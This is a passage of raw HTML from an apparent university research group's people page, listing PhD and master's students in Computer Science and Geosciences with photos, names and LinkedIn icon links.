<!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"style-855 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n            <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c88\" class=\"d-block style-854 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg\" class=\"wp-image-863 style-854-image style-local-182-c88-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c88-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c89\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassini</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-902 style-local-182-c91 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c92\" class=\"style-855 style-local-182-c92 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n            <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Basit-2.jpg\" class=\"wp-image-838 style-854-image style-local-182-c94-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c95\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n            <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/sara-edwards1.jpg\" class=\"wp-image-1399 style-854-image style-local-182-c100-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c101\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c104\" class=\"style-855 style-local-182-c104 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c105-outer\">\n            <div data-colibri-id=\"182-c105\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c105 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c106\" class=\"d-block style-854 style-local-182-c106 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg\" class=\"wp-image-1050 style-854-image style-local-182-c106-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c106-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c107\" class=\"h-global-transition-all h-heading style-850 style-local-182-c107 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c107\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-851 style-local-182-c108 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c109\" class=\"h-text h-text-component style-902 style-local-182-c109 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c110\" class=\"style-855 style-local-182-c110 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c111-outer\">\n            <div data-colibri-id=\"182-c111\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c111 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c112\" class=\"d-block style-854 style-local-182-c112 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg\" class=\"wp-image-1094 style-854-image style-local-182-c112-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c112-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c113\" class=\"h-global-transition-all h-heading style-850 style-local-182-c113 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c113\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-851 style-local-182-c114 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c115\" class=\"h-text h-text-component style-902 style-local-182-c115 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n            <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg\" class=\"wp-image-874 style-854-image style-local-182-c117-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c118\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Master\'s student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c122-outer\">\n            <div data-colibri-id=\"182-c122\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c122 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c123\" class=\"d-block style-854 style-local-182-c123 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/11/bayo-e1695781168350.jpeg\" class=\"wp-image-1369 style-854-image style-local-182-c123-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c123-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-850 style-local-182-c124 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c124\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c125\" class=\"h-text h-text-component style-851 style-local-182-c125 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Master\'s student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c126\" class=\"h-text h-text-component style-902 style-local-182-c126 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c127\" class=\"style-855 style-local-182-c127 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 